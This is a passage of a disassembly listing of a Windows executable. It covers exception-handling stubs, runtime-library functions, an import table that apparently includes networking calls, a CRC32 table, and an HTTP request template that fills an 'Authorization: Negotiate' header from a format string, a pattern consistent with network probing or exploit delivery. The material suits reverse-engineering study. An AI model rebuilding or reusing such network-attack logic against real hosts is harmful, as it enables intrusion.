mov dword ptr [ecx], offset off_427CCC
jmp sub_4260BA
sub_426277 endp
; =============== S U B R O U T I N E =======================================
sub_426282 proc near ; CODE XREF: sub_4262F6+46�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_426218
mov dword ptr [esi], offset off_427CA0
mov eax, esi
pop esi
retn 4
sub_426282 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42629A proc near ; CODE XREF: std::basic_string<char,std::char_traits<char>,std::allocator<char>>::append(uint,char)+15�p
; sub_40D7CD+15�p ...
var_3C = dword ptr -3Ch
var_20 = byte ptr -20h
var_D = dword ptr -0Dh
var_4 = dword ptr -4
mov eax, offset loc_426B2A
call __EH_prolog
sub esp, 30h
lea eax, [ebp+var_D]
push eax ; int
push offset aStringTooLong ; "string too long"
lea ecx, [ebp+var_20]
call sub_426090
and [ebp+var_4], 0
lea eax, [ebp+var_20]
push eax
lea ecx, [ebp+var_3C]
call sub_4261D0
push offset dword_4280B8
lea eax, [ebp+var_3C]
push eax
mov [ebp+var_3C], offset off_427CCC
call __CxxThrowException@8 ; _CxxThrowException(x,x)
int 3 ; Trap to Debugger
sub_42629A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4262DE proc near ; CODE XREF: sub_4262F6+28�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_426218
mov dword ptr [esi], offset off_427CCC
mov eax, esi
pop esi
retn 4
sub_4262DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4262F6 proc near ; DATA XREF: .rdata:00427C98�o
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_426218
push offset dword_4280F8
lea eax, [ebp+var_1C]
push eax
call __CxxThrowException@8 ; _CxxThrowException(x,x)
int 3 ; Trap to Debugger
loc_426314: ; DATA XREF: .rdata:00427CD4�o
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_4262DE
push offset dword_4280B8
lea eax, [ebp+var_1C]
push eax
call __CxxThrowException@8 ; _CxxThrowException(x,x)
int 3 ; Trap to Debugger
loc_426332: ; DATA XREF: .rdata:00427CA8�o
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_426282
push offset dword_428010
lea eax, [ebp+var_1C]
push eax
call __CxxThrowException@8 ; _CxxThrowException(x,x)
int 3 ; Trap to Debugger
sub_4262F6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_426350 proc near ; CODE XREF: sub_40D104+5E�p
; sub_40F3AA+14A�p ...
jmp ds:dword_427210
sub_426350 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_426356 proc near ; CODE XREF: unknown_libname_2+23�p
; __global_unwind2+13�p
jmp ds:dword_4271A4
sub_426356 endp
; [0000002D BYTES: COLLAPSED FUNCTION __itoa. PRESS KEYPAD "+" TO EXPAND]
; [0000005C BYTES: COLLAPSED FUNCTION _xtoa. PRESS KEYPAD "+" TO EXPAND]
; [00000080 BYTES: COLLAPSED FUNCTION __wcsicmp. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION __strdup. PRESS KEYPAD "+" TO EXPAND]
; [00000015 BYTES: COLLAPSED FUNCTION type_info::~type_info(void). PRESS KEYPAD "+" TO EXPAND]
; [0000001C BYTES: COLLAPSED FUNCTION type_info::`scalar deleting destructor'(uint). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4264C1 proc near ; DATA XREF: .rdata:off_427CF4�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_426564
test [esp+4+arg_0], 1
jz short loc_4264D7
push esi
call sub_41D65F
pop ecx
loc_4264D7: ; CODE XREF: sub_4264C1+D�j
mov eax, esi
pop esi
retn 4
sub_4264C1 endp
; [0000003D BYTES: COLLAPSED FUNCTION exception::exception(char const * const &). PRESS KEYPAD "+" TO EXPAND]
; [0000004A BYTES: COLLAPSED FUNCTION exception::exception(exception const &). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_426564 proc near ; CODE XREF: sub_4260BA+16�j
; sub_4264C1+3�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_427CF4
jz short locret_426579
push dword ptr [ecx+4]
call sub_41D65F
pop ecx
locret_426579: ; CODE XREF: sub_426564+A�j
retn
sub_426564 endp
; [0000000D BYTES: COLLAPSED FUNCTION unknown_libname_10. PRESS KEYPAD "+" TO EXPAND]
; [0000003A BYTES: COLLAPSED FUNCTION _CxxThrowException(x,x). PRESS KEYPAD "+" TO EXPAND]
; [00000075 BYTES: COLLAPSED FUNCTION _towlower. PRESS KEYPAD "+" TO EXPAND]
; [00000209 BYTES: COLLAPSED FUNCTION ___crtLCMapStringW. PRESS KEYPAD "+" TO EXPAND]
; [00000030 BYTES: COLLAPSED FUNCTION _wcsncnt. PRESS KEYPAD "+" TO EXPAND]
; [00000052 BYTES: COLLAPSED FUNCTION _iswctype. PRESS KEYPAD "+" TO EXPAND]
; [000001C5 BYTES: COLLAPSED FUNCTION ___crtGetStringTypeW. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
sub_426A88 proc near ; DATA XREF: .rdata:stru_427ED0�o
; FUNCTION CHUNK AT 0040D76C SIZE 00000008 BYTES
lea ecx, [ebp-38h]
jmp loc_40D76C
sub_426A88 endp
; =============== S U B R O U T I N E =======================================
sub_426A90 proc near ; DATA XREF: .rdata:stru_427ED0�o
mov eax, [ebp-20h]
and eax, 1
test eax, eax
jz locret_426AA6
mov ecx, [ebp+8]
jmp loc_40D76C
; ---------------------------------------------------------------------------
locret_426AA6: ; CODE XREF: sub_426A90+8�j
retn
sub_426A90 endp
; ---------------------------------------------------------------------------
loc_426AA7: ; DATA XREF: sub_40D340�o
mov eax, offset stru_427ED0
jmp ___CxxFrameHandler
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_426AB4 proc near ; DATA XREF: .rdata:stru_427F00�o
lea ecx, [ebp+14h]
jmp loc_40D76C
sub_426AB4 endp
; =============== S U B R O U T I N E =======================================
sub_426ABC proc near ; DATA XREF: .rdata:stru_427F00�o
lea ecx, [ebp-1Ch]
jmp loc_40D76C
sub_426ABC endp
; =============== S U B R O U T I N E =======================================
sub_426AC4 proc near ; DATA XREF: sub_40D4E2�o
mov eax, offset stru_427F00
jmp ___CxxFrameHandler
sub_426AC4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_426AD0 proc near ; DATA XREF: std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Copy(uint)�o
mov eax, offset stru_427F30
jmp ___CxxFrameHandler
sub_426AD0 endp
; =============== S U B R O U T I N E =======================================
sub_426ADA proc near ; DATA XREF: .rdata:stru_427F88�o
mov ecx, [ebp-14h]
jmp sub_426564
sub_426ADA endp
; ---------------------------------------------------------------------------
loc_426AE2: ; DATA XREF: sub_4260FE�o
mov eax, offset stru_427F90
jmp ___CxxFrameHandler
; =============== S U B R O U T I N E =======================================
sub_426AEC proc near ; DATA XREF: .rdata:stru_428020�o
lea ecx, [ebp-20h]
jmp loc_40D76C
sub_426AEC endp
; ---------------------------------------------------------------------------
loc_426AF4: ; DATA XREF: sub_426173�o
mov eax, offset stru_428028
jmp ___CxxFrameHandler
; =============== S U B R O U T I N E =======================================
sub_426AFE proc near ; DATA XREF: .rdata:stru_428044�o
mov ecx, [ebp-14h]
jmp sub_426564
sub_426AFE endp
; ---------------------------------------------------------------------------
loc_426B06: ; DATA XREF: sub_4261D0�o
mov eax, offset stru_42804C
jmp ___CxxFrameHandler
; =============== S U B R O U T I N E =======================================
sub_426B10 proc near ; DATA XREF: .rdata:stru_428068�o
mov ecx, [ebp-10h]
jmp sub_426564
sub_426B10 endp
; ---------------------------------------------------------------------------
loc_426B18: ; DATA XREF: sub_426218�o
mov eax, offset stru_428070
jmp ___CxxFrameHandler
; =============== S U B R O U T I N E =======================================
sub_426B22 proc near ; DATA XREF: .rdata:stru_4280C8�o
lea ecx, [ebp-20h]
jmp loc_40D76C
sub_426B22 endp
; ---------------------------------------------------------------------------
loc_426B2A: ; DATA XREF: sub_42629A�o
mov eax, offset stru_4280D0
jmp ___CxxFrameHandler
_text ends
; Section 2. (virtual address 00027000)
; Virtual size : 00001B90 ( 7056.)
; Section size in file : 00001B90 ( 7056.)
; Offset to raw data for section: 00027000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 427000h
dword_427000 dd 77E78EAAh ; DATA XREF: sub_41036B+5EC�r
; sub_41716F+C0�r ...
dword_427004 dd 77E70192h ; DATA XREF: __chsize+F9�r
dword_427008 dd 77E7176Ch ; DATA XREF: _ValidateExecute(int (*)(void))+8�r
dword_42700C dd 77E7339Ch ; DATA XREF: sub_424F80+C�r
dword_427010 dd 77E7C9E7h ; DATA XREF: sub_424F62+5�r
; sub_424F73+6�r
dword_427014 dd 77E7C866h ; DATA XREF: ___crtGetStringTypeA+3F�r
; ___crtGetStringTypeA+12D�r ...
dword_427018 dd 77E641EBh ; DATA XREF: ___crtGetStringTypeA+59�r
; ___crtGetStringTypeA+8D�r ...
dword_42701C dd 77E73FF9h ; DATA XREF: __commit+2C�r
dword_427020 dd 77E7FF2Eh ; DATA XREF: __set_osfhnd:loc_424009�r
; __free_osfhnd:loc_424083�r
dword_427024 dd 77E78406h ; DATA XREF: __ioinit+FF�r
; __ioinit+166�r ...
dword_427028 dd 77E79C3Dh ; DATA XREF: __ioinit+158�r
; __NMSG_WRITE+143�r
dword_42702C dd 77E7C931h ; DATA XREF: __ioinit+19D�r
dword_427030 dd 77E77EE1h ; DATA XREF: ___crtGetEnvironmentStringsA+9�r
dword_427034 dd 77E67702h ; DATA XREF: ___crtGetEnvironmentStringsA:loc_423A08�r
; ___crtGetEnvironmentStringsA+E1�r
dword_427038 dd 77E7C9E1h ; DATA XREF: ___crtGetEnvironmentStringsA+CE�r
dword_42703C dd 77E9C5B1h ; DATA XREF: ___crtGetEnvironmentStringsA+11F�r
dword_427040 dd 77EB9A84h ; DATA XREF: __XcptFilter+138�r
dword_427044 dd 77E781F9h ; DATA XREF: ___crtLCMapStringA+42�r
; ___crtLCMapStringA+14D�r ...
dword_427048 dd 77E77405h ; DATA XREF: ___crtLCMapStringA+5E�r
; ___crtLCMapStringA+A7�r ...
dword_42704C dd 77F522F2h ; DATA XREF: sub_422EA8+58�r
dword_427050 dd 77E6D706h ; DATA XREF: __raise_exc+215�r
; _CxxThrowException(x,x)+2E�r
dword_427054 dd 77E6C703h ; DATA XREF: _getSystemCP+1A�r
dword_427058 dd 77E7A13Fh ; DATA XREF: _getSystemCP+2F�r
dword_42705C dd 77E7849Fh ; DATA XREF: __setmbcp+48�r
; _setSBUpLow+14�r
dword_427060 dd 77E73196h ; DATA XREF: sub_424F9C+C�r
dword_427064 dd 77E7980Ah ; DATA XREF: ___sbh_alloc_new_region+76�r
; ___sbh_alloc_new_group+51�r ...
dword_427068 dd 77E79E34h ; DATA XREF: sub_41E742+240�r
; sub_41F216+120�r ...
dword_42706C dd 77E75CB5h ; DATA XREF: sub_40111D+DF�r
; WinMain(x,x,x,x)+7A�r ...
dword_427070 dd 77E77963h ; DATA XREF: sub_40111D+B8�r
; WinMain(x,x,x,x)+2DB�r ...
dword_427074 dd 77E61BB8h ; DATA XREF: sub_40111D+A7�r
; WinMain(x,x,x,x)+2C3�r ...
dword_427078 dd 77E7A099h ; DATA XREF: sub_40111D+83�r
; WinMain(x,x,x,x)+DA�r ...
dword_42707C dd 77E704FCh ; DATA XREF: sub_40111D+74�r
; WinMain(x,x,x,x)+C4�r ...
dword_427080 dd 77E61BE6h ; DATA XREF: sub_40111D+29�r
; WinMain(x,x,x,x)+1F4�r ...
dword_427084 dd 77E7AC37h ; DATA XREF: WinMain(x,x,x,x)+3C1�r
; sub_401ACD+79F�r ...
dword_427088 dd 77E73628h ; DATA XREF: WinMain(x,x,x,x)+33B�r
; sub_401ACD+76D4�r ...
dword_42708C dd 77E706B7h ; DATA XREF: WinMain(x,x,x,x):loc_401495�r
; sub_41761C+15�r ...
dword_427090 dd 77E80656h ; DATA XREF: WinMain(x,x,x,x)+267�r
dword_427094 dd 77F5157Dh ; DATA XREF: WinMain(x,x,x,x)+1D8�r
; WinMain(x,x,x,x)+3E6�r ...
dword_427098 dd 77E6BD13h ; DATA XREF: WinMain(x,x,x,x):loc_4013DC�r
dword_42709C dd 77E70396h ; DATA XREF: WinMain(x,x,x,x)+1B5�r
; WinMain(x,x,x,x)+221�r ...
dword_4270A0 dd 77E74CABh ; DATA XREF: WinMain(x,x,x,x)+19E�r
; sub_4100B4+110�r ...
dword_4270A4 dd 77E79F93h ; DATA XREF: WinMain(x,x,x,x)+D3�r
; sub_409909+2�r ...
dword_4270A8 dd 77E79D5Bh ; DATA XREF: WinMain(x,x,x,x)+6B�r
; WinMain(x,x,x,x)+311�r ...
dword_4270AC dd 77E7C2C4h ; DATA XREF: WinMain(x,x,x,x)+64�r
dword_4270B0 dd 77E7751Ah ; DATA XREF: WinMain(x,x,x,x)+2C�r
; sub_401ACD+253B�r ...
dword_4270B4 dd 77E75CEBh ; DATA XREF: sub_401ACD+791A�r
; sub_40B4F5+2B�r ...
dword_4270B8 dd 77E6AD34h ; DATA XREF: sub_401ACD+68CF�r
; sub_4188A6+35�r
dword_4270BC dd 77E71AFEh ; DATA XREF: sub_401ACD+6697�r
dword_4270C0 dd 77E805D8h ; DATA XREF: sub_409909+13A�r
; sub_409909:loc_409E17�r ...
dword_4270C4 dd 77E7A5FDh ; DATA XREF: sub_409909+11�r
; sub_4172C1+60�r ...
dword_4270C8 dd 77E65F4Ch ; DATA XREF: .text:0040ABED�r
; sub_419AE0+34�r
dword_4270CC dd 77E7513Ch ; DATA XREF: .text:0040AC84�r
; .text:0040B0C3�r
dword_4270D0 dd 77E7C657h ; DATA XREF: .text:0040ACF8�r
; .text:0040AF0F�r ...
dword_4270D4 dd 77E73C49h ; DATA XREF: sub_40B425+4A�r
; sub_40BB65+1AF�r ...
dword_4270D8 dd 77F7E300h ; DATA XREF: sub_40C3E8+142�r
dword_4270DC dd 77F7E21Fh ; DATA XREF: sub_40C3E8+D7�r
dword_4270E0 dd 77E7C706h ; DATA XREF: sub_40C600+77�r
dword_4270E4 dd 77F53275h ; DATA XREF: sub_40C600+6B�r
; sub_40C600+22F�r
dword_4270E8 dd 77E77CCEh ; DATA XREF: sub_40DB5E+66�r
; sub_40DC41+65�r ...
dword_4270EC dd 77E78B82h ; DATA XREF: .text:0040E081�r
; sub_40EED1+25�r ...
dword_4270F0 dd 77E79D8Ch ; DATA XREF: .text:0040E04F�r
; sub_40EE8E+3B�r ...
dword_4270F4 dd 77E73EACh ; DATA XREF: .text:0040E035�r
dword_4270F8 dd 77E7A837h ; DATA XREF: .text:0040DFB4�r
; sub_4100B4+1CB�r ...
dword_4270FC dd 77E616B4h ; DATA XREF: sub_40EF1C+19B�r
; sub_4116D6+115�r ...
dword_427100 dd 77E79CE3h ; DATA XREF: sub_40EF1C+111�r
; sub_411920+77�r ...
dword_427104 dd 77E79C90h ; DATA XREF: sub_40EF1C+FD�r
; sub_40EF1C+10A�r ...
dword_427108 dd 77E7727Ah ; DATA XREF: sub_40EF1C+74�r
; sub_411827+23�r ...
dword_42710C dd 77E64106h ; DATA XREF: sub_40FF31+A0�r
; sub_41AF8F+1B6�r
dword_427110 dd 77E64006h ; DATA XREF: sub_40FF31+8C�r
; sub_41AF8F+19F�r
dword_427114 dd 77E793EFh ; DATA XREF: sub_4100B4+1F5�r
; sub_4109F1+38�r ...
dword_427118 dd 77E79424h ; DATA XREF: sub_41036B+280�r
; sub_41761C+135�r
dword_42711C dd 77E794BFh ; DATA XREF: sub_41036B+272�r
; sub_41761C+123�r
dword_427120 dd 77E75E67h ; DATA XREF: sub_41036B+212�r
; sub_41036B+5DB�r ...
dword_427124 dd 77E75D9Eh ; DATA XREF: sub_41036B+201�r
; sub_41716F+26�r
dword_427128 dd 77E78C81h ; DATA XREF: sub_4109F1+6C�r
; sub_4161C1+259�r ...
dword_42712C dd 77E76968h ; DATA XREF: sub_41144E+5F�r
dword_427130 dd 77E74C59h ; DATA XREF: sub_4116D6+C7�r
dword_427134 dd 77EC7C51h ; DATA XREF: sub_411AAB+5E�r
dword_427138 dd 77E802FCh ; DATA XREF: sub_413694+18C�r
; sub_413694+2D4�r ...
dword_42713C dd 77E6D75Bh ; DATA XREF: sub_413694+182�r
; sub_4143F7+FF�r
dword_427140 dd 77E70F89h ; DATA XREF: sub_415D38+D�r
dword_427144 dd 77E80618h ; DATA XREF: sub_4172C1+170�r
; sub_418AF1+D4�r
dword_427148 dd 77E78147h ; DATA XREF: sub_4172C1+BC�r
dword_42714C dd 77F51597h ; DATA XREF: sub_417493+41�r
; sub_417493+F5�r ...
dword_427150 dd 77F516F8h ; DATA XREF: sub_417493+21�r
; sub_41761C+4A�r ...
dword_427154 dd 77E77CB7h ; DATA XREF: sub_417493+10�r
; sub_41761C+40�r ...
dword_427158 dd 77E7F01Ah ; DATA XREF: sub_41761C+88�r
; sub_4177C3+55�r
dword_42715C dd 77E61A54h ; DATA XREF: sub_41761C+56�r
; sub_4177C3+97�r
dword_427160 dd 77E7C3A5h ; DATA XREF: sub_41761C+34�r
; sub_4177C3+2E�r
dword_427164 dd 77E76A60h ; DATA XREF: sub_418699+2D�r
dword_427168 dd 77E71B14h ; DATA XREF: sub_418723+26�r
dword_42716C dd 77E7166Fh ; DATA XREF: sub_418723+1D�r
dword_427170 dd 77E75090h ; DATA XREF: sub_41875E+69�r
dword_427174 dd 77E74D76h ; DATA XREF: sub_41875E+36�r
dword_427178 dd 77E77797h ; DATA XREF: sub_41875E+25�r
dword_42717C dd 77E7011Ah ; DATA XREF: sub_4187E0+96�r
dword_427180 dd 77E73CE2h ; DATA XREF: sub_4187E0+60�r
dword_427184 dd 77E668D9h ; DATA XREF: sub_4188A6+15D�r
dword_427188 dd 77E79924h ; DATA XREF: sub_4190A5+13�r
; ___crtLCMapStringA+20D�r ...
dword_42718C dd 77E76A2Eh ; DATA XREF: sub_419C09+DE�r
dword_427190 dd 77E7FF65h ; DATA XREF: sub_41A05C+5A�r
dword_427194 dd 77EB7624h ; DATA XREF: sub_41A05C+3D�r
dword_427198 dd 77E6C29Dh ; DATA XREF: sub_41A6EA+1EB�r
dword_42719C dd 77E76C1Ah ; DATA XREF: sub_41AF8F+1CF�r
dword_4271A0 dd 77F5722Fh ; DATA XREF: sub_41BBE2+110�r
; sub_41BBE2+22D�r ...
dword_4271A4 dd 77F6183Eh ; DATA XREF: sub_426356�r
dword_4271A8 dd 77E6177Ah ; DATA XREF: start+9F�r __ioinit+59�r
dword_4271AC dd 77E7C938h ; DATA XREF: start+74�r
dword_4271B0 dd 77E7C486h ; DATA XREF: start+26�r
dword_4271B4 dd 77E7AC5Eh ; DATA XREF: sub_41E52A+54�r
dword_4271B8 dd 77E76E0Bh ; DATA XREF: sub_41E672+50�r
dword_4271BC dd 77E7C726h ; DATA XREF: sub_41E672+11�r
dd 0
dword_4271C4 dd 71AB5A01h ; DATA XREF: sub_4157BA+20�r
dword_4271C8 dd 71AB4122h ; DATA XREF: sub_4156D1+D4�r
dword_4271CC dd 71AB1746h ; DATA XREF: sub_4131EC+1DE�r
dword_4271D0 dd 71AB401Ch ; DATA XREF: sub_4131EC+21B�r
; sub_4131EC+243�r
dword_4271D4 dd 71AB1836h ; DATA XREF: sub_40F9BF+6E�r
; sub_40FA3C+8E�r
dword_4271D8 dd 71AB41DAh ; DATA XREF: sub_40F3AA+4A�r
; sub_40F9BF+15�r
dword_4271DC dd 71AB3F8Dh ; DATA XREF: sub_40F3AA+5A�r
dword_4271E0 dd 71AB155Ah ; DATA XREF: sub_40F3AA+8D�r
; sub_414251+70�r ...
dword_4271E4 dd 71AB3ECEh ; DATA XREF: sub_40F3AA+B5�r
dword_4271E8 dd 71AB5DE2h ; DATA XREF: sub_40F3AA+C9�r
dword_4271EC dd 71AB868Dh ; DATA XREF: sub_40F3AA+171�r
dword_4271F0 dd 71AB12F8h ; DATA XREF: sub_40E9FB+27�r
; sub_40F9BF+35�r ...
dword_4271F4 dd 71AB1746h ; DATA XREF: sub_40E9FB+36�r
; sub_40F9BF+41�r ...
dword_4271F8 dd 71AB3E5Dh ; DATA XREF: sub_40E9FB+59�r
; sub_40EAE9+45�r ...
dword_4271FC dd 71AB5690h ; DATA XREF: sub_40E9FB+6A�r
; sub_40F3AA+1E1�r
dword_427200 dd 71AB1A6Dh ; DATA XREF: sub_40E9FB+E0�r
; sub_40EAE9:loc_40EB55�r ...
dword_427204 dd 71AB3C22h ; DATA XREF: .text:0040D64C�r
; sub_40E9FB+45�r ...
dword_427208 dd 71AB1AF4h ; DATA XREF: sub_40D2A2+12�r
; sub_40E9FB+C3�r ...
dword_42720C dd 71AB1890h ; DATA XREF: sub_40D104+4C�r
; sub_40F3AA+106�r
dword_427210 dd 71AB1B7Bh ; DATA XREF: sub_426350�r
dword_427214 dd 71AB157Eh ; DATA XREF: sub_401ACD+2F5F�r
align 10h
dword_427220 dd 0 ; DATA XREF: sub_401070+26�r
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dword_427620 dd 2Eh ; DATA XREF: sub_401ACD+3428�o
; sub_401ACD+3514�o ...
dword_427624 dd 2Eh ; DATA XREF: sub_401ACD+3850�o
; sub_401ACD+388A�o ...
; char aGetHttp1_0Host[]
aGetHttp1_0Host db 'GET / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_40D4E2+62�o
db 'Host: %s',0Dh,0Ah
db 'Authorization: Negotiate %s',0Dh,0Ah
db 0Dh,0Ah,0
align 8
dbl_427668 dq 1.388888888888889e-2 ; DATA XREF: sub_40D2F4+2F�r
dbl_427670 dq 1.666666666666667e-1 ; DATA XREF: sub_40D2F4+15�r
dword_427678 dd 0FFFFFFFFh ; DATA XREF: sub_40D340+16F�r
; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::append(uint,char)�r ...
align 10h
dbl_427680 dq 1.333333333333333 ; DATA XREF: sub_40D340+79�r
dword_427688 dd 2 dup(0) ; DATA XREF: sub_40D4E2+4D�o
; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(std::basic_string<char,std::char_traits<char>,std::allocator<char>> const &,uint,uint)+5B�o ...
dbl_427690 dq 9.765625e-4 ; DATA XREF: sub_4167A0+2BD�r
; sub_4167A0+2D8�r ...
dbl_427698 dq -1.52587890625e-4 ; DATA XREF: sub_417E84+3E5�r
dbl_4276A0 dq 3.0517578125e-4 ; DATA XREF: sub_417E84+3C5�r
dbl_4276A8 dq -3.0517578125e-4 ; DATA XREF: sub_417E84+342�r
; sub_417E84+3A7�r
dbl_4276B0 dq 1.52587890625e-4 ; DATA XREF: sub_417E84+271�r
dbl_4276B8 dq -1.739501953125e-3 ; DATA XREF: sub_417E84+24B�r
; sub_417E84+2D5�r ...
dbl_4276C0 dq 3.11279296875e-3 ; DATA XREF: sub_417E84+E1�r
dbl_4276C8 dq 3.0517578125e-5 ; DATA XREF: sub_417E84+AE�r
; sub_417E84+138�r ...
dbl_4276D0 dq 6.103515625e-5 ; DATA XREF: sub_417E84+93�r
; sub_417E84+308�r
dbl_4276D8 dq 2.288818359375e-3 ; DATA XREF: sub_417E84+21�r
dbl_4276E0 dq -3.0517578125e-5 ; DATA XREF: sub_418BD1+2B�r
flt_4276E8 dd 9.765625e-4 ; DATA XREF: sub_41AA1E+1B0�r
flt_4276EC dd 8.0 ; DATA XREF: sub_41AA1E+1AA�r
flt_4276F0 dd 0.0 ; DATA XREF: sub_41AA1E+171�r
flt_4276F4 dd 1.0e-3 ; DATA XREF: sub_41AA1E+168�r
dbl_4276F8 dq 1.0 ; DATA XREF: _floor+6C�r _ceil+6C�r ...
dword_427700 dd 0FFFFFFFFh, 41E2AAh, 41E2BEh ; DATA XREF: start+5�o
; char Str1[]
Str1 db '__GLOBAL_HEAP_SELECTED',0 ; DATA XREF: sub_41E52A+8E�o
align 4
a__msvcrt_heap_ db '__MSVCRT_HEAP_SELECT',0 ; DATA XREF: sub_41E52A+4F�o
align 4
byte_42773C db 6 ; DATA XREF: __output:loc_41FF96�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
db 8,'`h````',0
